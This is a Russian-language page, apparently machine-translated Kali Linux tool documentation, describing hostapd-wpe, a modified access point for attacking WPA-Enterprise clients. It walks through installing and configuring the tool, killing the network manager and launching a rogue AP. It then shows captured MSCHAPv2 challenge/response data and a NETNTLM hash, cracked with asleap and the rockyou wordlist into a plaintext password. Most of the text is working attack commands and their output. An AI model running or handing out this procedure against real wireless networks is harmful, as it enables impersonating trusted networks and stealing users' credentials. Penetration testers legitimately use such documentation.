//kalinux.info
Wireless Attacks 563 просмотров

Hostapd-wpe

Описание пакета hostapd-wpe

hostapd-wpe является заменой FreeRADIUS-WPE.

Он реализует атаки олицетворения и аутентификации IEEE 802.1x для получения учетных данных клиента, установления подключения к клиенту и запуска других атак, где это применимо.

hostapd-wpe поддерживает следующие типы EAP для олицетворения: 
1. EAP-FAST / MSCHAPv2 (Phase 0) 
2. PEAP / MSCHAPv2 
3. EAP-TTLS / MSCHAPv2 
4. EAP-TTLS / MSCHAP 
5. EAP-TTLS / CHAP 
6. EAP-TTLS / PAP

После того, как выполняется олицетворение, hostapd-wpe вернет сообщение EAP-Success, чтобы клиент считал, что он подключен к их законному аутентификатору.

Для клиентов 802.11 hostapd-wpe также реализует беспроигрышные пробные ответы в стиле Karma. Вдохновение для этого было обеспечено патчем JoMo-Kun для более старых версий hostapd.

Hostapd-wpe

Использование hostapd-wpe

hostapd-wpe - Измененный hostapd для облегчения атак AP

Обновите свою установку Kali, установите hostapd-wpe, если она еще не указана.

root @ kali: ~ # apt update 
root @ kali: ~ # apt install hostapd-wpe

После установки настройте свойства AP, отредактировав /etc/hostapd-wpe/hostapd-wpe.conf

root @ kali: ~ # nano /etc/hostapd-wpe/hostapd-wpe.conf

Убить сетевого менеджера с использованием airmon-ng

root@kali:~# airmon-ng check kill

Запустите hostapd-wpe. Появится беспроводная точка доступа. Пароли пользователей, подключающихся и аутентифицирующих в эту сеть, будут напечатаны на консоли.

root @ kali: ~ # hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf 
Файл конфигурации: /etc/hostapd-wpe/hostapd-wpe.conf 
Использование интерфейса wlan0 с hwaddr c4: e9: 84: 17: ff : c8 и ssid «hostapd-wpe» 
wlan0: состояние интерфейса UNINITIALIZED> ENABLED 
wlan0: AP-ENABLED 
wlan0: STA ac: fd: ec: 78: 72: bd IEEE 802.11: аутентифицирован 
wlan0: STA ac: fd: ec: 78: 72: bd IEEE 802.11: связанный (помощь 1) 
wlan0: CTRL-EVENT-EAP-STARTED ac: fd: ec: 78: 72: bd 
wlan0: CTRL-EVENT-EAP-ПРЕДЛАГАЕМЫЙ-МЕТОД поставщик = 0 method = 1 
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor = 0 method = 25 

mschapv2: Сб Ноя 12 16:04:03 2016 
имя пользователя: me 
challenge: 8e: 0e: 9d: 0b: 5a: 3f: f5: 23
ответ: 34: f8: 42: 4d: 16: c7: 2d: 69: cc: 38: 10: d4: cf: 71: f7: 83: 37: 68: d8: 8a: e9: 86: f2: 67 
jtr NETNTLM: me: $ NETNTLM $ 8e0e9d0b5a3ff523 $ 34f8424d16c72d69cc3810d4cf71f7833768d88ae986f267 

wlan0: CTRL-EVENT-EAP-FAILURE AC: fd: ec: 78: 72: bd 
wlan0: STA ac: fd: ec: 78: 72: bd IEEE 802.1X: ошибка аутентификации - Тип EAP: 0 (неизвестно) 
wlan0: STA ac: fd: ec: 78: 72: bd IEEE 802.1X: Поставщик использовал различный тип EAP: 25 (PEAP) 
wlan0: STA ac: fd: ec: 78: 72: bd IEEE 802.11: disassociated 
wlan0: STA ac: fd: ec: 78: 72: bd IEEE 802.11: deauthenticated из-за локального запроса 
deauth wlan0: AP- 
DISABLED nl80211: deinit ifname = wlan0 disabled_11b_rates = 0 
root @ kali: ~ #

Как только вы получите вызов и ответ, взломайте их с помощью asleap вместе с файлом словаря паролей.

root @ kali: ~ # zcat /usr/share/wordlists/rockyou.txt.gz | asleap -C 8e: 0e: 9d: 0b: 5a: 3f: f5: 23 -R 34: f8: 42: 4d: 16: c7: 2d: 69: cc: 38: 10: d4: cf: 71: f7: 83: 37: 68: d8: 8a: e9: 86: f2: 67 -W - 
asleap 2.2 - активно восстанавливать пароли LEAP / PPTP. <jwright@hasborg.com> 
Использование STDIN для слов. 
хэш-байты: 586c 
NT хэш: 8846f7eaee8fb117ad06bdd830b7586c 
пароль: password